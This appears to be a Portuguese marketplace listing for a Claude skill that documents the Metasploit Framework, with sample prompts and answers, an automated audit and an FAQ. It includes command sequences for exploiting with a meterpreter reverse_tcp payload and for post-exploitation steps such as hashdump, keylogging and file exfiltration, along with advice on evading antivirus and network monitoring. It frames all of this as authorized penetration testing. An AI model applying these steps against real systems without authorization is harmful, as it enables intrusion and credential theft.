Habilidades metasploit-framework
🔒

metasploit-framework

Risco Médio ⚙️ Comandos externos🌐 Acesso à rede📁 Acesso ao sistema de arquivos

Domine Testes de Penetração com Metasploit usando Claude

Profissionais de segurança precisam de orientação especializada para fluxos de trabalho de testes de penetração autorizados. Esta skill fornece documentação abrangente do Metasploit Framework cobrando exploração, geração de payloads e atividades de pós-exploração com melhores práticas legais.

Suporta: Claude Codex Code(CC)
⚠️ 66 Ruim
1

Baixar o ZIP da skill

2

Upload no Claude

Vá em Configurações → Capacidades → Skills → Upload skill

3

Ative e comece a usar

Testar

A utilizar "metasploit-framework". Como iniciar o msfconsole e pesquisar exploits SMB?

Resultado esperado:

Para iniciar o msfconsole e pesquisar exploits SMB: Inicie o console com 'msfconsole -q' para modo silencioso, depois use 'search type:exploit smb' para encontrar módulos de exploit relacionados a SMB. Você também pode pesquisar especificamente com 'search eternalblue' para o exploit da vulnerabilidade SMB MS17-010. Revise detalhes do módulo com 'info [module_name]' antes de selecionar.

A utilizar "metasploit-framework". Quais são os passos para configurar e executar um exploit com payload meterpreter?

Resultado esperado:

Configure um exploit em seis passos: Primeiro use 'use [module_path]' para selecionar o exploit. Execute 'show options' para ver configurações necessárias. Defina parâmetros do alvo com 'set RHOSTS [target_ip]' e 'set RPORT [port]'. Escolha seu payload com 'set PAYLOAD windows/x64/meterpreter/reverse_tcp'. Configure o listener com 'set LHOST [your_ip]' e 'set LPORT [port]'. Finalmente execute com 'exploit' para tentar comprometimento e estabelecer uma sessão Meterpreter.

A utilizar "metasploit-framework". Quais comandos do Meterpreter devo usar após obter uma sessão?

Resultado esperado:

Após estabelecer uma sessão Meterpreter, execute 'sysinfo' e 'getuid' para entender seu nível de acesso. Use 'hashdump' para extrair hashes de senha e 'ps' para visualizar processos em execução. Execute 'migrate [PID]' para mover para um processo mais estável. Para exfiltração de dados, use 'download [file]' ou 'upload [file]'. Execute 'screenshot' para capturar a área de trabalho ou 'keyscan_start' para iniciar registro de teclas. Coloque a sessão em background com 'background' para retornar ao msfconsole.

Auditoria de Segurança

Risco Médio
v1 • 2/25/2026

This skill provides documentation for the Metasploit Framework, a legitimate penetration testing tool used by security professionals. All detected patterns are educational examples showing authorized security testing workflows. The skill includes appropriate legal disclaimers emphasizing written authorization requirements. While it documents offensive security capabilities that could be misused, the context clearly indicates professional security assessment purposes with proper legal safeguards.

1
Arquivos analisados
484
Linhas analisadas
7
achados
1
Total de auditorias
Problemas de Risco Médio (1)
Documentation of Offensive Security Tools
This skill provides comprehensive documentation for Metasploit Framework, a penetration testing tool that can be used for both authorized security testing and malicious activities. The content includes exploit modules, payload generation, post-exploitation techniques (credential harvesting, keylogging, screenshots), and persistence mechanisms. While the skill includes legal disclaimers emphasizing written authorization requirements, the detailed technical documentation could be misused by unauthorized actors.
Problemas de Baixo Risco (3)
Bash Command Examples in Documentation
The skill contains numerous bash command examples showing Metasploit usage (msfconsole, msfvenom, meterpreter commands). These are educational documentation examples, not executable code. Risk is low as these require manual execution by a user who should already have authorization for penetration testing activities.
Example IP Addresses in Documentation
The skill uses example IP addresses (192.168.x.x private ranges) for demonstration purposes. These are standard documentation examples and do not represent hardcoded targets.
Post-Exploitation Capability Documentation
The skill documents Meterpreter capabilities including keylogging, screenshots, credential harvesting, and file operations. These are descriptions of legitimate penetration testing tool capabilities used during authorized security assessments, not implementations of malicious functionality.

Fatores de risco

Auditado por: claude

Pontuação de qualidade

38
Arquitetura
100
Manutenibilidade
87
Conteúdo
50
Comunidade
54
Segurança
91
Conformidade com especificações

O Que Você Pode Construir

Orientação para Fluxo de Trabalho de Testes de Penetração

Profissionais de segurança usam esta skill durante engajamentos de testes de penetração autorizados para navegar pelas capacidades do Metasploit Framework, selecionar módulos de exploit apropriados, configurar payloads e conduzir atividades de pós-exploração dentro do escopo legal.

Documentação de Avaliação de Segurança

Membros de red team aproveitam esta skill para documentar o uso do Metasploit em relatórios de avaliação de segurança, garantindo que sintaxe de comandos adequada, seleção de módulos e atividades de pós-exploração sejam registradas com precisão para entregas ao cliente.

Recurso Educacional para Treinamento em Segurança

Estudantes de segurança cibernética e candidatos a certificações usam esta skill para aprender conceitos do Metasploit Framework, praticar fluxos de trabalho de testes de penetração em ambientes de laboratório e se preparar para certificações como OSCP, CEH e PTX.

Tente Estes Prompts

Pesquisa e Seleção Básica de Módulos
Como pesquisar e selecionar um módulo de exploit do Metasploit apropriado para um alvo Windows com vulnerabilidades SMB?
Configuração e Execução de Exploit
Guie-me na configuração do exploit eternalblue com um payload meterpreter reverse_tcp, incluindo definir RHOSTS, LHOST e opções necessárias.
Pós-Exploração com Meterpreter
Após estabelecer uma sessão Meterpreter, quais comandos devo usar para enumerar o sistema alvo, coletar credenciais e manter persistência durante um teste de penetração autorizado?
Geração de Payload com msfvenom
Gere um comando msfvenom para criar um payload executável Windows com conexão TCP reversa, incluindo codificação para evadir detecção de antivírus.

Melhores Práticas

  • Sempre obtenha autorização por escrito antes de conduzir qualquer atividade de teste de penetração com Metasploit
  • Use o comando 'check' primeiro para verificar vulnerabilidade do alvo antes de executar exploits para minimizar disrupção
  • Teste payloads em ambientes de laboratório isolados antes de implantar em alvos de avaliação de produção
  • Documente todos os comandos, resultados e descobertas para inclusão em relatórios de testes de penetração
  • Use payloads reverse_https criptografados em vez de reverse_tcp quando possível para evadir monitoramento de rede
  • Coloque sessões em background e migre processos imediatamente para manter estabilidade de acesso

Evitar

  • Não use exploits do Metasploit em sistemas sem autorização por escrito explícita - isto é ilegal
  • Evite executar todos exploits sequencialmente contra alvos sem reconhecimento adequado e verificação de vulnerabilidade
  • Nunca use sistemas de produção ou endereços IP públicos em comandos de exemplo durante documentação ou treinamento
  • Não deixe sessões Meterpreter ativas sem supervisão ou esqueça de fechá-las adequadamente após avaliações
  • Evite usar payloads não codificados que são facilmente detectados por antivírus sem testar técnicas de evasão primeiro

Perguntas Frequentes

O Metasploit Framework é legal para uso?
Sim, o Metasploit é uma ferramenta legítima de teste de penetração usada por profissionais de segurança em todo o mundo. No entanto, usá-lo contra sistemas que você não possui ou sem autorização por escrito é ilegal. Sempre garanta que você tem autorização legal adequada e regras de engajamento documentadas antes de conduzir qualquer teste de segurança.
Qual é a diferença entre msfconsole e msfvenom?
msfconsole é a interface principal do Metasploit Framework para executar exploits, gerenciar sessões e conduzir atividades de pós-exploração. msfvenom é uma ferramenta autônoma de geração de payloads que cria executáveis personalizados, scripts e shellcode para várias plataformas sem precisar da interface completa do console.
Por que meus exploits falham ou sessões morrem imediatamente?
Causas comuns incluem detecção por antivírus, arquitetura de payload incompatível, firewall bloqueando conexões reversas ou travamento do processo alvo. Soluções incluem usar payloads codificados, corresponder a arquitetura do payload ao sistema operacional alvo, migrar para processos estáveis imediatamente e usar payloads stageless para conexões mais confiáveis.
Quais são os diferentes tipos de payload no Metasploit?
O Metasploit tem três categorias de payload: Singles são payloads autocontidos que executam independentemente. Stagers são pequenos payloads iniciais que baixam e executam um stage maior. Stages são os payloads completos com todas funcionalidades baixados pelos stagers, fornecendo funcionalidade completa como Meterpreter. A convenção de nomenclatura segue plataforma/arquitetura/tipo/conexão.
Como evadir detecção de antivírus com payloads do Metasploit?
Use múltiplas iterações de codificação com a flag -e e parâmetro -i para ofuscar payloads. Considere usar módulos de evasão, templates de payload personalizados ou tipos alternativos de payload como reverse_https. Para evasão avançada, você pode precisar criar loaders de shellcode personalizados ou usar frameworks de geração de payloads de terceiros junto com o Metasploit.
Esta skill pode executar comandos do Metasploit diretamente através do Claude ou Claude Code?
Não, esta skill fornece documentação e orientação para o Metasploit Framework mas não executa comandos diretamente. Você deve ter o Metasploit instalado no seu sistema e executar comandos através do seu terminal. A skill ajuda você a entender sintaxe adequada, seleção de módulos, configuração e fluxos de trabalho de solução de problemas.

Detalhes do Desenvolvedor

Estrutura de arquivos

📄 SKILL.md